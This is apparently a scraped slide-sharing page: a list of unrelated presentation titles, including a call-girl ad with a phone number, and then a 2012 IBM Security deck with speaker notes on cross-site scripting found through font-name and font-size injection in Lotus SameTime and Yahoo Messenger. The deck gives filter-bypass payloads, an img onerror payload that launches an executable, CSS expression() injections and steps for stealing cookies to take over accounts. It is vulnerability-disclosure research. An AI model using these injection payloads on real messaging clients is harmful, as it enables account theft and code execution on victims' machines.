04-2024-HHUG-Sales-and-Marketing-Alignment.pptx04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
 
The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024
 
Exploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone ProcessorsExploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone Processors
 
How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonets
 
Histor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slideHistor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slide
 
[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf
 
Handwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsHandwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed texts
 
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
 
Factors to Consider When Choosing Accounts Payable Services Providers.pptx
Factors to Consider When Choosing Accounts Payable Services Providers.pptxFactors to Consider When Choosing Accounts Payable Services Providers.pptx
Factors to Consider When Choosing Accounts Payable Services Providers.pptx
 
Artificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsArtificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and Myths
 
Automating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps ScriptAutomating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps Script
 
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)
 
Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...
 

Stylish XSS via Font Name Injection

  • 1. © 2012 IBM Corporation IBM Security Systems 1© 2012 IBM Corporation Stylish XSS via Font Name Injection
  • 2. © 2012 IBM Corporation IBM Security Systems 2 Background - Instant Messengers
  • 3. © 2012 IBM Corporation IBM Security Systems 3 Background - Instant Messengers <Text Style=" font-family:Segoe UI; font-weight:bold; font-style:italic; color:#008000; ">Hi!</Text>
  • 4. © 2012 IBM Corporation IBM Security Systems 4 Background - Instant Messengers Every time I’ve seen this screen, I wondered “What if I could use some HTML here…”
  • 5. © 2012 IBM Corporation IBM Security Systems 5 Background - Windows Fonts Windows accepts basically any character as part of the font name Font name length limited to ~30 chars
  • 6. © 2012 IBM Corporation IBM Security Systems 6 IBM Lotus SameTime Messenger <span style="font-size:14pt;font-family:Segoe UI; font-weight:normal;font-style:normal;">You Do!</span>
  • 7. © 2012 IBM Corporation IBM Security Systems 7 SameTime - Exploit - CSS Font Name: expression(alert(1));
  • 8. © 2012 IBM Corporation IBM Security Systems 8 SameTime - Exploit - CSS Font Name: expression(alert(1)); Desired output: <span style= ";font-family:expression(alert(1));…"> Actual output: <span style="">
  • 9. © 2012 IBM Corporation IBM Security Systems 9 SameTime - Exploit - New Attribute Font Name: "onclick="alert(1)" Desired output: <span style="font-size:9pt;font-family:“ onclick="alert(1)" ..."> Actual output: <span style="font-size:9pt;font-family:" onclick="">
  • 10. © 2012 IBM Corporation IBM Security Systems 10 SameTime - Exploit ~50 Fonts Later
  • 11. © 2012 IBM Corporation IBM Security Systems 11 SameTime - Exploit - Found Message sent: <span style=“…font-family: Message Received: <span style=“…font-family:
  • 12. © 2012 IBM Corporation IBM Security Systems 12 SameTime - Exploit - Found Message sent: <span style=“…font-family:e0” <<style<style</style>img x='> Message Received: <span style=“…font-family:
  • 13. © 2012 IBM Corporation IBM Security Systems 13 SameTime - Exploit - Found Message sent: <span style=“…font-family:e0” <<style<style</style>img x='> Message Received: <span style=“…font-family:e0”> <img x='>
  • 14. © 2012 IBM Corporation IBM Security Systems 14 SameTime - Exploit - Found Message sent: <span style=“…font-family:e0” <<style<style</style>img x='>Rest of Orig CSS"> Message Received: <span style=“…font-family:e0”> <img x='>Rest of Orig CSS">
  • 15. © 2012 IBM Corporation IBM Security Systems 15 SameTime - Exploit - Found Message sent: <span style=“…font-family:e0” <<style<style</style>img x='>Rest of Orig CSS">' src='x' onerror='location="c:windowssystem32calc.exe" ' Message Received: <span style=“…font-family:e0”> <img x='>Rest of Orig CSS">
  • 16. © 2012 IBM Corporation IBM Security Systems 16 SameTime - Exploit - Found Message sent: <span style=“…font-family:e0” <<style<style</style>img x='>Rest of Orig CSS">' src='x' onerror='location="c:windowssystem32calc.exe" ' </span> Message Received: <span style=“…font-family:e0”> <img x='>Rest of Orig CSS">' src='x' onerror='location="c:windowssystem32calc.exe" ' </span>
  • 17. © 2012 IBM Corporation IBM Security Systems 17 SameTime – Remote Code Execution <span style="font-size:14pt;font-family:e0"> <img x=';font-weight:normal;font-style:normal;">' src='x' onerror='location="c:windowssystem32calc.exe"'</span>
  • 18. © 2012 IBM Corporation IBM Security Systems 18 Yahoo Messenger
  • 19. © 2012 IBM Corporation IBM Security Systems 19 Yahoo Messenger – Message View Lots of Colors, but that’s about it…
  • 20. © 2012 IBM Corporation IBM Security Systems 20 Yahoo Messenger - History View
  • 21. © 2012 IBM Corporation IBM Security Systems 21 Yahoo Messenger - History View
  • 22. © 2012 IBM Corporation IBM Security Systems 22 Yahoo Messenger - History View Finally, Yahoo's purple alert!
  • 23. © 2012 IBM Corporation IBM Security Systems 23 Yahoo Messenger - The Payload <img src="x"onmouseover="alert(1)">
  • 24. © 2012 IBM Corporation IBM Security Systems 24 Yahoo Messenger - Digging Deeper Wait, what? It's not local?!
  • 25. © 2012 IBM Corporation IBM Security Systems 25 Yahoo Messenger - Digging Deeper Accessing this URL in Chrome, yields the same result.
  • 26. © 2012 IBM Corporation IBM Security Systems 26 Yahoo Messenger - Digging Deeper That means I can read the cookie! And steal your account!
  • 27. © 2012 IBM Corporation IBM Security Systems 27 Yahoo Messenger - Recap 1. Send the victim a message that contain malicious HTML snippet 2. Wait 3-4 hours for it to show up in the history 3. Convince the user to access his history or send him a direct link to it (after all, it not local) 4. Have the victim click the Instant Message from the drop-down box
  • 28. © 2012 IBM Corporation IBM Security Systems 28 Yahoo Messenger - Introducing: Web Messenger! Finally I can see the results of my attacks in real time!
  • 29. © 2012 IBM Corporation IBM Security Systems 29 Yahoo Messenger - Web Messenger During the tests, I noticed that a <Font> tag sent as part of the message text, is being rendered differently in the Web Messenger. • The message: <font face="xxx" size="20">33333</font> • Was rendered as: <font style="font-size:20pt" face="xxx“ id="yui_3_2_0_20_1330267588862427">33333</font>
  • 30. © 2012 IBM Corporation IBM Security Systems 30 Yahoo Messenger - Exploiting CSS Add a new rule with an expression() call.
  • 31. © 2012 IBM Corporation IBM Security Systems 31 Yahoo Messenger - Exploiting CSS Started With: <font face=ssss size="1&color:red">xxxx</font> To my surprise the response came back as I hoped <font style="font-size:1&amp;color:red" >xxxx</font>
  • 32. © 2012 IBM Corporation IBM Security Systems 32 Yahoo Messenger - Exploiting CSS Next was the expression: <font face=sssss size="1&color:expression(alert(1))" >xxxx</font> And again, it seems like nothing is filtering this... <font style="font-size:1&amp;color:expression(alert(1))" >xxxx</font>
  • 33. © 2012 IBM Corporation IBM Security Systems 33 Yahoo Messenger - Exploiting CSS Time to open Internet Explorer!
  • 34. © 2012 IBM Corporation IBM Security Systems 34 Yahoo Web Messenger - IE Version
  • 35. © 2012 IBM Corporation IBM Security Systems 35 Yahoo Web Messenger - IE Version The Rules (for IE): 1. The Size attribute must be surrounded by double-quotes (" ") 2. The size value must be followed by the "pt;" suffix <font size="15pt;"> <font style="font-size=15pt;">
  • 36. © 2012 IBM Corporation IBM Security Systems 36 Yahoo Web Messenger - IE Version By tweaking the size value, a new Font-Family CSS rule could be injected. <font size="15pt;font-family:aaaa;"> <font style="font-size=15pt;font-family: aaaa;">
  • 37. © 2012 IBM Corporation IBM Security Systems 37 Yahoo Web Messenger - IE Version With all that in mind, and ~30 <Font> tags later, came the following payload that bypass the CSS filtering <font size="15pt;font-family:expression(alert(1));">
  • 38. © 2012 IBM Corporation IBM Security Systems 38 Yahoo Web Messenger - IE Version It should work correctly according to the rendered source in IE Developer Tools
  • 39. © 2012 IBM Corporation IBM Security Systems 39 Yahoo Web Messenger - IE Version Yet somehow, no alert
  • 40. © 2012 IBM Corporation IBM Security Systems 40 Yahoo Web Messenger - Uber Meta! After ~5 hours of more fiddling and long lonely IM chats with myself I finally found out what I was afraid of. Or in other words, The "No Expression For You" Meta Tag <meta http-equiv="X-UA-Compatible" content="IE=8"/>
  • 41. © 2012 IBM Corporation IBM Security Systems 41 Yahoo Web Messenger - Going Old School Fired up my Windows XP VM and kicked out IE8
  • 42. © 2012 IBM Corporation IBM Security Systems 42 Yahoo Web Messenger - Finally
  • 43. © 2012 IBM Corporation IBM Security Systems 43 Yahoo Messenger - History Window
  • 44. © 2012 IBM Corporation IBM Security Systems 44 Questions?

Hinweis der Redaktion

  1. Who am I? This presentation is going to show an idea I had and how I leveraged this idea into 3 vulnerabilities in the major IM clients One of which will not be disclosed today due to the fact that it was not yet patched. It will be publish in our blog once it is patched
  2. Explain how IMs work: Talk about: -------------- The message window is actually a browser The users text message is wrapped in HTML\XML template containing the following fields Message is sent to and then rendered as HTML\XML in the clients browser. Accept parameters dictating: color Font name Font weight Font style And more בואו נדבר על IMS ונשים רגע בצד את כל הפונקציונאליות של וידאו, סאונד שליחת קבצים וכו ונשאיר רק את האספקט של שליחת ההודעות. אם ננסה למפות את הדרכים שלנו לשלוח קלט למערכת, נגיע למשהו כמו בדוגמא
  3. Explain how IMs work: Talk about: -------------- The message window is actually a browser The users text message is wrapped in HTML\XML template containing the following fields Message is sent to and then rendered as HTML\XML in the clients browser. Accept parameters dictating: color Font name Font weight Font style And more בואו נדבר על IMS ונשים רגע בצד את כל הפונקציונאליות של וידאו, סאונד שליחת קבצים וכו ונשאיר רק את האספקט של שליחת ההודעות. אם ננסה למפות את הדרכים שלנו לשלוח קלט למערכת, נגיע למשהו כמו בדוגמא
  4. To configure all these setting, these apps usually come with a screen like this one Every time I’ve seen this screen, I wondered “what if I could use some HTML here…”
  5. And apparently, you can! Windows fonts, All Chars are valid Max 30 chars in every font name
  6. Explain that the font we change, goes into this template and then sent out. Talk about possibilities of exploits: 1. Expression 2. Get out to span tag 3. Get out to HTML main context
  7. Starting off with expression
  8. The server actually filtered everything in the CSS
  9. Moving to the next payload, Getting out of the style attr and getting into a new onclick attr Result in the onclick being empty. No good
  10. Two fields attack First field (Font Name): ----------- 1. Filter deletes the <style<style</style part 2. We are left with e0”><img x=‘….. Opens a new IMG tag with X attribute (using a single quot) Second field (Message Text): --------------- 1. Closes the X attribute (it contains all the rest of the real CSS) 2. Adds a SRC attribute 3. Adds an ONERROR attribute relocation the windows to an EXE/BAT file 4. File will be executed
  11. Two fields attack First field (Font Name): ----------- 1. Filter deletes the <style<style</style part 2. We are left with e0”><img x=‘….. Opens a new IMG tag with X attribute (using a single quot) Second field (Message Text): --------------- 1. Closes the X attribute (it contains all the rest of the real CSS) 2. Adds a SRC attribute 3. Adds an ONERROR attribute relocation the windows to an EXE/BAT file 4. File will be executed
  12. Two fields attack First field (Font Name): ----------- 1. Filter deletes the <style<style</style part 2. We are left with e0”><img x=‘….. Opens a new IMG tag with X attribute (using a single quot) Second field (Message Text): --------------- 1. Closes the X attribute (it contains all the rest of the real CSS) 2. Adds a SRC attribute 3. Adds an ONERROR attribute relocation the windows to an EXE/BAT file 4. File will be executed
  13. Two fields attack First field (Font Name): ----------- 1. Filter deletes the <style<style</style part 2. We are left with e0”><img x=‘….. Opens a new IMG tag with X attribute (using a single quot) Second field (Message Text): --------------- 1. Closes the X attribute (it contains all the rest of the real CSS) 2. Adds a SRC attribute 3. Adds an ONERROR attribute relocation the windows to an EXE/BAT file 4. File will be executed
  14. Two fields attack First field (Font Name): ----------- 1. Filter deletes the <style<style</style part 2. We are left with e0”><img x=‘….. Opens a new IMG tag with X attribute (using a single quot) Second field (Message Text): --------------- 1. Closes the X attribute (it contains all the rest of the real CSS) 2. Adds a SRC attribute 3. Adds an ONERROR attribute relocation the windows to an EXE/BAT file 4. File will be executed
  15. Two fields attack First field (Font Name): ----------- 1. Filter deletes the <style<style</style part 2. We are left with e0”><img x=‘….. Opens a new IMG tag with X attribute (using a single quot) Second field (Message Text): --------------- 1. Closes the X attribute (it contains all the rest of the real CSS) 2. Adds a SRC attribute 3. Adds an ONERROR attribute relocation the windows to an EXE/BAT file 4. File will be executed
  16. Second line shows the trapped CSS in the X parameter Calc executed example
  17. Yahoo No History found in local FS, meaning template is unknown Messages sent takes about 3-4 hours till they register in the History That means that every time I wanted to test anything, I have to wait 3-4 for the results and only then tweak my payloads and resend everything…
  18. Message view seems to sanitize input well, All messages sent managed to do nothing more the pretty colors Taking into account the fact that every test take 3 hours, I decided its best to move on and open the history
  19. Looks a bit better but still, nothing interesting…
  20. The next step I took was to change the history filter to “Instant Messages”
  21. Boom Endless pop ups poped up… Apparently a lot of my tests worked…
  22. I isolated the simplest payload that worked and we can now move on and get some info such as: User Agent Privileges Etc…
  23. Digging deeper got us the browser type (IE) And the location of the page, which is an internet address
  24. So I tried accessing this page using chrome, and as long as I was Logged in to Yahoo! It got me to the same results!
  25. The next thing I found was the cookie Apparently, Yahoo don’t like to use HTTP-only cookies, so once stealing the cookie actually means stealing the account!
  26. Send message Wait 3-4h Social engineer the user into opening the History Have the user click on the Instant Messages context menu
  27. No more 3 hours tests I can now send a message and see it on the web messenger immediately I now know the template.
  28. I sent the first line of code The web messenger rendered the second line of code Changes: Added a new ID attribute – We don’t care! Transformed the Size attribute into a CSS Font-Size attribute – Very Interesting!
  29. First, I tried to inject a new color:red sentence Using the & -> &amp; encoding in order to terminate the css rule and inject a new one And that worked without a glitch
  30. Tried the same with an expression call, and all seems well
  31. Opening IE But no alert… After digging a little deeper
  32. Different sanitizer per browser Found an older message that has a similar behavior Worked in that example till I found some guidelines for the transformation on IE
  33. Talk about the two rules of transformation
  34. Using these guidelines I attempted a new rule injection
  35. Payload found – new rule injected Explain the CSS encoding trick
  36. Everything looks good in IE
  37. Somehow, no alert
  38. Goddamn meta tag But this meta tag doesn’t work in IE<8
  39. VM Kick off IE8
  40. Entered the same URL with IE 7 and the alert shows up
  41. Also in the original History view of the messenger which actually uses the installed IE